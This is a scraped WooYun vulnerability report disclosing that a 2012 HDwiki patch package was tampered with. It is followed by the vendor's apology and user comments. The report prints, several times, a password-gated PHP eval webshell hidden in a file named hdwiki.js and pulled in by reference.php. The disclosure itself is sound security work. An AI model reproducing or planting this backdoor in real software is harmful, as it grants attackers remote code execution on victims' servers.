	$.get('/ajaxdo.php',{'module':'collect','id':id,'token':token,'rid':Math.random()},function(re){
		if(re==1){
			$("#collection_num").html(parseInt($("#collection_num").html())+1);
			$(".btn-fav").removeClass("fav-add");
			$(".btn-fav").addClass("fav-cancel");
			$(".btn-fav").unbind();
			$(".btn-fav").click(function(){
					CollectCancel(id,token);
				});
		}else if(re==2){
			alert(_LANGJS.LOGIN_FIRST);
		}else if(re==3){
			alert(_LANGJS.COLLECTION_BUG_DONE);
		}else{
			alert(_LANGJS.FAIL_MANAGE);
		}
	});
}
function CollectCancel(id,token){
	if(confirm(_LANGJS.COLLECTION_BUG_CONFIRM+"?")){
		$.get('/ajaxdo.php',{'module':'collectcancel','id':id,'token':token,'rid':Math.random()},function(re){
			if(re==1){
				$("#collection_num").html(parseInt($("#collection_num").html())-1);
				$(".btn-fav").removeClass("fav-cancel");
				$(".btn-fav").addClass("fav-add");
				$(".btn-fav").unbind();
				$(".btn-fav").click(function(){
					CollectBug(id,token);
				});
			}else{
				alert(_LANGJS.FAIL_MANAGE);
			}
		});
	}
}
</script>

	<div class="content">
<input type="hidden" id="token" style="display:none" value="" />
		<h2>漏洞概要
						<span style="margin:0 0 0 580px; float:right; position:absolute; font-size:14px; font-weight:normal">关注数(<span id="attention_num">36</span>)
		 <span id="attend_action">
		 		 <a class="btn" href="javascript:void(0)" onclick="AttendBug(10772)">关注此漏洞</a></span>
		 		 </span></h2>

		<h3>缺陷编号：		<a href="wooyun-2012-010772">WooYun-2012-10772</a>
			<input id="fbid" type="hidden" value="10772">
					</h3>

		<h3 class='wybug_title'>漏洞标题：		HDwiki各版本新漏洞补丁包2012-08-09发现后门代码  					</h3>

		<h3 class='wybug_corp'>相关厂商：		<a href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">
														互动在线（北京）科技有限公司														</a>
		</h3>

		<h3 class='wybug_author'>漏洞作者：		<a href="http://www.wooyun.org/whitehats/kindle">kindle</a></h3>
		<h3 class='wybug_date'>提交时间：		2012-08-10 09:53</h3>
				<h3 class='wybug_open_date'>公开时间：		2012-09-24 09:54</h3>
		<h3 class='wybug_type'>漏洞类型：		成功的入侵事件</h3>

		<h3 class='wybug_level'>危害等级：		高</h3>
				<h3>自评Rank：		10</h3>
				<h3 class='wybug_status'>漏洞状态：
															厂商已经确认
																</h3>

		<h3>漏洞来源：		<a href="http://www.wooyun.org">http://www.wooyun.org</a>，如有疑问或需要帮助请联系 help@wooyun.org</h3>
		<h3>Tags标签：
												<span class="tag"><a href="http://wooyun.org/tags/%E8%BF%90%E7%BB%B4%E7%AE%A1%E7%90%86%E4%B8%8D%E5%BD%93">运维管理不当</a></span>
							<span class="tag"><a href="http://wooyun.org/tags/%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%90%8E%E9%97%A8">应用程序后门</a></span>
							<span class="tag"><a href="http://wooyun.org/tags/%E5%AE%98%E6%96%B9%E7%A8%8B%E5%BA%8F%E8%A2%AB%E6%9B%BF%E6%8D%A2">官方程序被替换</a></span>
							<span class="tag"><a href="http://wooyun.org/tags/%E6%BA%90%E7%A0%81%E5%90%8E%E9%97%A8">源码后门</a></span>
							<span class="tag"><a href="http://wooyun.org/tags/%E8%BF%9C%E7%A8%8BPHP%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C">远程PHP代码执行</a></span>
								
</h3>
		<h3>
		<!-- Baidu Button BEGIN -->
        <div id="share">
        	<div style="float:right; margin-right:100px;font-size:12px">
            <span class="fav-num"><a id="collection_num">0</a>人收藏</span>
			<a style="text-decoration:none; font-size:12px" href="javascript:void(0)" class="fav-add btn-fav">收藏</a>
<script type="text/javascript">
var token="";
var id="10772";

$(".btn-fav").click(function(){ CollectBug(id,token); });

</script>
			</div>
            <span style="float:left;">分享漏洞：</span>
            <div id="bdshare" class="bdshare_b" style="line-height: 12px;"><img src="http://bdimg.share.baidu.com/static/images/type-button-5.jpg" />
                <a class="shareCount"></a>
            </div>
        </div>
        <!-- Baidu Button END -->
    	</h3>
		<hr align="center"/>

		<h2>漏洞详情</h2>
		<h3 class="detailTitle">披露状态：</h3>
		<p class="detail" style="padding-bottom:0">
					</p>
		<p class="detail wybug_open_status">
									2012-08-10：	细节已通知厂商并且等待厂商处理中<br/>
									2012-08-11：	厂商已经确认，细节仅向厂商公开<br/>
									2012-08-21：	细节向核心白帽子及相关领域专家公开<br/>
									2012-08-31：	细节向普通白帽子公开<br/>
									2012-09-10：	细节向实习白帽子公开<br/>
									2012-09-24：	细节向公众公开<br/>
								</p>
		<h3 class="detailTitle">简要描述：</h3>

		<p class="detail wybug_description">HDwiki各版本新漏洞补丁包2012-08-09发现后门代码</p>

		
						<h3 class="detailTitle">详细说明：</h3>
    <div class='wybug_detail'>
			<p class="detail">在看补丁包中的 reference.php 文件时， 首行并发现了如下不明之处：<br />

<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>&lt;?php<br />
/**<br />
词条编辑页面的参考资料<br />
*/<br />
require_once(dirname(__FILE__).&quot;/../js/jqeditor/hdwiki.js&quot;); // 就是这里， 好端端的PHP。include js文件干什么<br />
!defined(&#039;IN_HDWIKI&#039;) &amp;&amp; exit(&#039;Access Denied&#039;);<br />
<br />
class control extends base{<br />
<br />
        function control(&amp; $get,&amp; $post){<br />
                $this-&gt;base( &amp; $get,&amp; $post);<br />
                $this-&gt;load(&quot;reference&quot;);</code></pre></fieldset><p class='detail'><br />

<br />
<br />

<br />
require_once(dirname(__FILE__).&quot;/../js/jqeditor/hdwiki.js&quot;); // 就是这里， 好端端的PHP。include js文件干什么<br />

<br />
<br />

<br />
然后就看了一下补丁包中的 hdwiki.js<br />

<br />
<br />

<br />
终于明白官方的用心了 hdwiki.js<br />

<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>&lt;?php<br />
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST[&quot;fvckadmin&quot;])).sha1($_POST[&quot;fvckadmin&quot;]))))) == &quot;b697afd0486d62a72afd3044ef259858b701814d&quot;){<br />
                       eval ($_REQUEST[&quot;mjj&quot;]);<br />
}<br />
?&gt;<br />
function delSave(){<br />
        $.post(&quot;index.php?doc-delsave&quot;,{did:g_docid},function(xml){<br />
                if (&#039;sucess&#039; != xml.lastChild.firstChild.nodeValue){<br />
                        alert(&#039;exception&#039;);<br />
                }<br />
        });<br />
}</code></pre></fieldset><p class='detail'><br />

<br />
<br />

<br />
这不是明摆着的一句话木马么。<br />

<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>&lt;?php<br />
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST[&quot;fvckadmin&quot;])).sha1($_POST[&quot;fvckadmin&quot;]))))) == &quot;b697afd0486d62a72afd3044ef259858b701814d&quot;){<br />
                       eval ($_REQUEST[&quot;mjj&quot;]);<br />
}<br />
?&gt;</code></pre></fieldset><p class='detail'><br />

<br />
<br />

<br />
不过这密码的强度的确很高。加了这么多层。 </p>
    </div>
						
			<h3 class="detailTitle">漏洞证明：</h3>
      <div class='wybug_poc'>
			<p class="detail"></p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>&lt;?php<br />
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST[&quot;fvckadmin&quot;])).sha1($_POST[&quot;fvckadmin&quot;]))))) == &quot;b697afd0486d62a72afd3044ef259858b701814d&quot;){<br />
                       eval ($_REQUEST[&quot;mjj&quot;]);<br />
}<br />
?&gt;</code></pre></fieldset><p class='detail'> </p>
    </div>
									<h3 class="detailTitle">修复方案：</h3>
      <div class='wybug_patch'>
			<p class="detail">不用我说，官方给个解释吧 </p>
    </div>
													<h3 class="detailTitle">版权声明：转载请注明来源 <a style="font-weight:normal" href="http://www.wooyun.org/whitehats/kindle" title="kindle">kindle</a>@<a style="font-weight:normal" href="http://www.wooyun.org/bugs/wooyun-2010-010772" title="HDwiki各版本新漏洞补丁包2012-08-09发现后门代码">乌云</a></h3>
		<hr align="center"/>

		
			<h2 id="bugreply">漏洞回应</h2>
      <div class='bug_result'>
			
				
				
															<h3 class="detailTitle">厂商回应：</h3>
						<p class="detail">危害等级：高</p>
						<p class="detail">漏洞Rank：10 </p>
													<p class="detail">确认时间：2012-08-11 12:21</p>
												<h3 class="detailTitle">厂商回复：</h3>
						<p class="detail">Thanks</p>
					
					<h3 class="detailTitle">最新状态：</h3>

											<p class="detail">暂无</p>
					
				      </div>
					
		
<hr align="center" />
<script type="text/javascript">
var bugid="10772";
var bugRating="-3";
var myRating="";
var ratingCount="0";



function ShowBugRating(k){
	var ratingItems=$(".myrating span");
	$.each(ratingItems,function(i,n){
		var nk=parseInt($(n).attr("rel"));
		if(nk<=k){
			$(n).addClass("on");
		}else{
			$(n).removeClass("on");
		}
	});
	$(".myrating span").hover(
		function(){
			$("#ratingShow").html($(this).attr("data-title"));
		},
		function(){
			$("#ratingShow").html("");
		}
	);
}
$(document).ready(function(){
	if(myRating==""){
		var ratingItems=$(".myrating span");
		$(".myrating span").hover(
			function(){
				$(this).addClass("hover");
				var k=parseInt($(this).attr("rel"));
				$.each(ratingItems,function(i,n){
					var nk=parseInt($(n).attr("rel"));
					if(nk<k) $(n).addClass("on");
					if(nk>k) $(n).removeClass("on");
				});
				$("#ratingShow").html($(this).attr("data-title"));
			},
			function(){
				$(this).removeClass("hover");
				if($("#myRating").val()==""){
					$.each(ratingItems,function(i,n){
						$(n).removeClass("on");
					});
				}
				$("#ratingShow").html("");
			}
		);

		$(".myrating span").click(function(){
			var rating=$(this).attr("rel");
			var k=parseInt($(this).attr("rel"));
			$.post("/ajaxdo.php?module=bugrating",{"id":bugid,"rating":rating,"token":$("#token").val()},function(re){
				//消除操作绑定
				$(".myrating span").unbind();
				re=parseInt(re);
				switch(re){
					case 1:
						$("#ratingShow").html(_LANGJS.RATING_SUCCESS);
						$("#ratingSpan").html(parseInt($("#ratingSpan").html())+1);
						$.each(ratingItems,function(i,n){
							var nk=parseInt($(n).attr("rel"));
							if(nk<=k){
								$(n).addClass("on");
							}else{
								$(n).removeClass("on");
							}
						});
						ShowBugRating(rating);
						break;
					case 2:
						$("#ratingShow").html(_LANGJS.LOGIN_FIRST);
						break;
					case 4:
						$("#ratingShow").html(_LANGJS.RATING_BUGS_DONE);
						break;
					case 6:
						$("#ratingShow").html(_LANGJS.RATING_BUGS_SELF);
						break;
					default:break;
				}
			});
		});
	}else{
		if(ratingCount>2){
			ShowBugRating(bugRating);
		}else{
			ShowBugRating(-3);
		}
	}
});

</script>
<h3 class="detailTitle">漏洞评价：</h3>
<p class="detail">对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值</p>
		<h5 class="rating">
		<div class="ratingText">漏洞评价<span>(共<span id="ratingSpan">0</span>人评价)</span>:</div>
		<div class="myrating">
			<span rel="-2" data-title="信息虚假或者没有任何自己的思考"></span>
			<span rel="-1" data-title="内容不详并且漏洞信息评级及类型明显错误"></span>
			<span rel="0" data-title="还可以，洞主继续努力"></span>
			<span rel="1" data-title="信息完整，过程清晰，有截图有代码有视频有真相"></span>
			<span rel="2" data-title="角度独特思路新颖值得学习"></span>
			<div id="ratingShow">
			登陆后才能进行评分			</div>
		</div>
		</h5>
		<input type="hidden" id="myRating" value="" />

<hr align="center" />
<h2>评价</h2>

<div id="replys" class="replys">
		<div class="good_replys">
    <div class="good_replys_title">
        这些评论似乎很乌云~~~思密达
    </div>
	<div class="good_replys_list">
		<ol class="replylist">
						<li class="reply clearfix">
				<div class="reply-content">
					<div class="reply-info">
				<span class="addtime">2012-08-10 13:03</span> |
					<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
							</div><!-- reply-info End -->

					<div class="description">
						<p>2012年8月9日发布的补丁包在开源论坛上被恶意篡改了，很是郁闷，我在这里郑重向大家道歉。同时也很感谢发现这个问题的朋友。只是帖子里的那句&#039;终于明白了官方的用心~~&#039; 这句话我打从心里很难受。因为这绝对绝对不是官方的‘用心’~ 但也很理解，
因为任谁可能都会有这种感觉。尤其站在广大用户角度上可能更是如此（大家可能会想出现漏洞之后打补丁，补丁里面继续有漏洞？？？气！！）
但我只想代表我个人说一句：“欢迎大家发现问题，我不敢保证以后还会发现什么漏洞，但我唯一敢保证的是，有漏洞我会继续打补丁，补丁有漏洞我会继续再打补丁”直到大家在也挑不出漏洞为止。
不说了，论坛帖子已经更新，大家可以放心下载修复了~ </p>
					</div>

					<div class="replylist-act">
							<a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
					</div>
				</div><!-- reply-content End -->
			</li>
					</ol>
		</div><!-- /.good_replys_list -->
	</div><!-- /.google_replys -->
	    <ol class="replylist">
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 09:55</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/风萧萧">风萧萧</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:1068 漏洞数:80        | 人这一辈子总要动真格的爱上什么人)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19459"></span>
        <span class="liketext liketext_min"><span id="likenum_19459">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>我草 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">1#</span>
                        <a title="回复 风萧萧" href="javascript:void(0)" class="replyBtn" onclick="Reply('风萧萧')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 09:58</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/小乖">小乖</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 路人 |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:21 漏洞数:6        | 这个家伙很懒，什么也没留下。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19460"></span>
        <span class="liketext liketext_min"><span id="likenum_19460">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>附上围观地址http://bbs.python520.com/thread-6926-1-1.html </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">2#</span>
                        <a title="回复 小乖" href="javascript:void(0)" class="replyBtn" onclick="Reply('小乖')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 10:06</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/Coody">Coody</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 核心白帽子 |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:1809 漏洞数:214        | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19462"></span>
        <span class="liketext liketext_min"><span id="likenum_19462">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>补丁===后门？？？？ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">3#</span>
                        <a title="回复 Coody" href="javascript:void(0)" class="replyBtn" onclick="Reply('Coody')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 10:35</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/saviour">saviour</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:188 漏洞数:29        | Saviour.Com.Cn 网站正在备案中)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19467"></span>
        <span class="liketext liketext_min"><span id="likenum_19467">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>.js的后门 会执行php文件吗 哈哈 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">4#</span>
                        <a title="回复 saviour" href="javascript:void(0)" class="replyBtn" onclick="Reply('saviour')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 10:36</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/zeracker">zeracker</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:1077 漏洞数:139        | 爱吃小龙虾。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19468"></span>
        <span class="liketext liketext_min"><span id="likenum_19468">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>这影响... </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">5#</span>
                        <a title="回复 zeracker" href="javascript:void(0)" class="replyBtn" onclick="Reply('zeracker')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 11:01</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/葉孒">葉孒</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:37 漏洞数:5        | 呵呵)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19470"></span>
        <span class="liketext liketext_min"><span id="likenum_19470">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>这程序漏洞一堆。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">6#</span>
                        <a title="回复 葉孒" href="javascript:void(0)" class="replyBtn" onclick="Reply('葉孒')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 11:04</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/小乖">小乖</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 路人 |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:21 漏洞数:6        | 这个家伙很懒，什么也没留下。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19471"></span>
        <span class="liketext liketext_min"><span id="likenum_19471">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@saviour 包含在某php文件内你说会执行么0.0？ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">7#</span>
                        <a title="回复 小乖" href="javascript:void(0)" class="replyBtn" onclick="Reply('小乖')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 11:26</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/horseluke">horseluke</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:116 漏洞数:18        | Realize the dream in earnest.)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19478"></span>
        <span class="liketext liketext_min"><span id="likenum_19478">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>HDWiki究竟要闹哪样.........能被三番四次的搞...... </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">8#</span>
                        <a title="回复 horseluke" href="javascript:void(0)" class="replyBtn" onclick="Reply('horseluke')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 11:34</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/Fooying">Fooying</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 路人 |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:5 漏洞数:1        | 我是路人，非甲乙丙丁)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19480"></span>
        <span class="liketext liketext_min"><span id="likenum_19480">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>无语，一句话 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">9#</span>
                        <a title="回复 Fooying" href="javascript:void(0)" class="replyBtn" onclick="Reply('Fooying')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 11:37</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/风萧萧">风萧萧</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:1068 漏洞数:80        | 人这一辈子总要动真格的爱上什么人)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19481"></span>
        <span class="liketext liketext_min"><span id="likenum_19481">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@horseluke 被搞没什么，这里的厂商都被搞过！关键是后门事件，这个要严肃处理！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">10#</span>
                        <a title="回复 风萧萧" href="javascript:void(0)" class="replyBtn" onclick="Reply('风萧萧')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 11:49</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/horseluke">horseluke</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:116 漏洞数:18        | Realize the dream in earnest.)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19485"></span>
        <span class="liketext liketext_min"><span id="likenum_19485">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@风萧萧 问题是三番四次，三番四次啊！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">11#</span>
                        <a title="回复 horseluke" href="javascript:void(0)" class="replyBtn" onclick="Reply('horseluke')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 12:16</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/imlonghao">imlonghao</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:740 漏洞数:75        )
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19490"></span>
        <span class="liketext liketext_min"><span id="likenum_19490">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>HDWiki 威武！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">12#</span>
                        <a title="回复 imlonghao" href="javascript:void(0)" class="replyBtn" onclick="Reply('imlonghao')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 12:17</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/hongygxiang">hongygxiang</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:115 漏洞数:12        | 蛋疼)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19491"></span>
        <span class="liketext liketext_min"><span id="likenum_19491">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>围观;碉堡。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">13#</span>
                        <a title="回复 hongygxiang" href="javascript:void(0)" class="replyBtn" onclick="Reply('hongygxiang')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 12:26</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/random_">random_</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:315 漏洞数:52        | 推动开源
推动网络安全)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19494"></span>
        <span class="liketext liketext_min"><span id="likenum_19494">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>关注 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">14#</span>
                        <a title="回复 random_" href="javascript:void(0)" class="replyBtn" onclick="Reply('random_')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:03</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19497"></span>
        <span class="liketext liketext_min"><span id="likenum_19497">2</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>2012年8月9日发布的补丁包在开源论坛上被恶意篡改了，很是郁闷，我在这里郑重向大家道歉。同时也很感谢发现这个问题的朋友。只是帖子里的那句&#039;终于明白了官方的用心~~&#039; 这句话我打从心里很难受。因为这绝对绝对不是官方的‘用心’~ 但也很理解，
因为任谁可能都会有这种感觉。尤其站在广大用户角度上可能更是如此（大家可能会想出现漏洞之后打补丁，补丁里面继续有漏洞？？？气！！）
但我只想代表我个人说一句：“欢迎大家发现问题，我不敢保证以后还会发现什么漏洞，但我唯一敢保证的是，有漏洞我会继续打补丁，补丁有漏洞我会继续再打补丁”直到大家在也挑不出漏洞为止。
不说了，论坛帖子已经更新，大家可以放心下载修复了~ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">15#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:07</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/Ray">Ray</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:75 漏洞数:7        )
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19498"></span>
        <span class="liketext liketext_min"><span id="likenum_19498">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 顶，有漏洞会继续打补丁，补丁有漏洞会继续再打补丁，这句太酷了。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">16#</span>
                        <a title="回复 Ray" href="javascript:void(0)" class="replyBtn" onclick="Reply('Ray')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:09</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/胯下有杀气">胯下有杀气</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:241 漏洞数:14        | 大姐，你黄瓜掉了。。。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19499"></span>
        <span class="liketext liketext_min"><span id="likenum_19499">2</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司  官方态度还算可以，但是有一点要清楚，这补丁里的东西可不是什么“漏洞”，而是个后门，后门不是说删就删掉的，修漏洞代码容易，但是被人放后门不是第一次了吧，这个应该怎么查怎么追究怎么保证下次不会发生呢？ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">17#</span>
                        <a title="回复 胯下有杀气" href="javascript:void(0)" class="replyBtn" onclick="Reply('胯下有杀气')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:09</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/Ray">Ray</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:75 漏洞数:7        )
	
	<div class="likebox">
